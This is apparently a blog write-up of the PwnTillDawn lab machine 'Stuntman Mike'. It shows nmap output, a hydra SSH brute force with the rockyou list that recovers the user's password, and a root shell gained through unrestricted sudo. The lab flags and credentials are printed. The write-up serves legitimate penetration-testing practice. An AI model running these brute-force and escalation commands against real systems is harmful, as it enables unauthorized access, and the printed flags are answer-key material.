Post

Stuntman Mike

Posted Updated
Stuntman Mike -> https://www.wizlynxgroup.com/ , https://online.pwntilldawn.com/
Stuntman Mike -> https://www.wizlynxgroup.com/ , https://online.pwntilldawn.com/
By Shivendra Prajapati
4 min read

Port Scan Results ⤵️

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.166]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.150.150.166
Nmap scan report for 10.150.150.166
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 (protocol 2.0)
| ssh-hostkey: 
|   2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)
|   256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA)
|_  256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)
8089/tcp open  ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:15:13
|_Not valid after:  2022-10-24T09:15:13
|_http-server-header: Splunkd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Web Enumeration ⤵️

Now I got splunkd open on port 8089 :

Untitled

while tring ssh on this machine I got this one FLAG →

1
2
3
4
5
6
7
8
9
10
11
12
13
14

┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.166]
└─$ ssh 10.150.150.166            
The authenticity of host '10.150.150.166 (10.150.150.166)' cant be established.
ED25519 key fingerprint is SHA256:wCj0PIambullovu4ygX2+b6IVT8d8x2gEDeOB2D3OE4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.150.150.166' (ED25519) to the list of known hosts.
You are attempting to login to stuntman mike is server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360
kali@10.150.150.166s password: 
Permission denied, please try again.
kali@10.150.150.166 is password: 
Permission denied, please try again.
kali@10.150.150.166 is password: 
kali@10.150.150.166: Permission denied (publickey,password).

Then I tried bruteforce into the username as mike for SSH login and as a result I got it →

1
2
3
4
5
6
7
8
9
10

┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.166]
└─$ hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://10.150.150.166 -t 4 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-18 14:34:52
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.150.150.166:22/
[22][ssh] host: 10.150.150.166   login: mike   password: babygirl
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-18 14:35:05

Credentials are →

1

mike : babygirl

Now it SSH time →

SSH Login ⤵️

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

┌──(kali㉿kali)-[~/Downloads/PwnTillDawn/10.150.150.166]
└─$ ssh mike@10.150.150.166       
You are attempting to login to stuntman mikes server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360
mike@10.150.150.166 password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Sep 18 09:42:35 UTC 2023

  System load:  0.01               Processes:            167
  Usage of /:   28.7% of 19.56GB   Users logged in:      1
  Memory usage: 20%                IP address for ens33: 10.150.150.166
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

18 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

*** System restart required ***
Last login: Tue Apr 21 08:57:00 2020
mike@stuntmanmike:~$

Now lets check how this user can get me to root →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

mike@stuntmanmike:~$ sudo -l
[sudo] password for mike: 
Sorry, try again.
[sudo] password for mike: 
Matching Defaults entries for mike on stuntmanmike:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on stuntmanmike:
    (ALL : ALL) ALL
mike@stuntmanmike:~$ sudo /bin/bash -i
root@stuntmanmike:~# whoami
root
root@stuntmanmike:~# id
uid=0(root) gid=0(root) groups=0(root)
root@stuntmanmike:~# cd /root
root@stuntmanmike:/root# ls -al
total 36
drwx------  4 root root 4096 May 14  2020 .
drwxr-xr-x 23 root root 4096 Jan 30  2022 ..
-rw-------  1 root root  721 Apr 21  2020 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  115 May 14  2020 CAM.shortcut
-rw-r--r--  1 root root   41 May 27  2019 FLAG37
drwxr-xr-x  3 root root 4096 May 27  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 May 27  2019 .ssh
root@stuntmanmike:/root# cat FLAG37 
28d10397e475a50fc0d6c73f7c23355ebdf15a3f
root@stuntmanmike:/root#

It was time waste for me after I got the username from hid & trial method.

If you have any questions or suggestions, please leave a comment below. Thank You !

PwnTillDawn
SSH Bruteforce
This post is licensed under CC BY 4.0 by the author.